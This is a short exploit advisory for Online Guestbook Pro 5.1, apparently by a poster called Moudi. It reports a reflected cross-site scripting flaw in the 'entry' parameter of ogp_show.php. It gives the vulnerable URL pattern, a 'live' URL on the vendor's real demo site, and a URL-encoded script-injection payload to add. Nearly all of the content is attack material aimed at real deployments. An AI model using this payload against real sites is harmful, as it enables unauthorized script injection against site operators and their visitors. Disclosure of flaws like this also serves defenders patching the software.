Online Guestbook Pro version 5.1 suffers from a cross site scripting vulnerability.
316a7de722244a1fef251ad9b11895d95e9e08cea3261c3bfed2ed472ca791f3
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[»] I am from the hell...
==============================================================================
[»] Online Guestbook Pro 5.1 Remote XSS vulnerability
==============================================================================
[»] Script: [ Online Guestbook Pro 5.1 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.esoftpro.com/web_scripts_online_guestbook_pro.php ]
[»] Founder: [ Moudi <m0udi@9.cn> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man...]
[»] Team: [ EvilWay ]
[»] SiteWeb: [ Want your site here ? ADD ME MSN. ]
[»] Price: [ 24.95 $ ]
###########################################################################
===[ XSS ]===
[»] http://www.site.com/patch/ogp_show.php?display=[nm]&sort=&entry=[XSS]&search=&search_choice=
===[ LIVE ]===
[»] http://www.esoftpro.com/demo/OGP/ogp_show.php?display=150&sort=&entry=[XSS]&search=&search_choice=
[»] XSS TO ADD: %22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E
Note: -.-
Author: Moudi
###########################################################################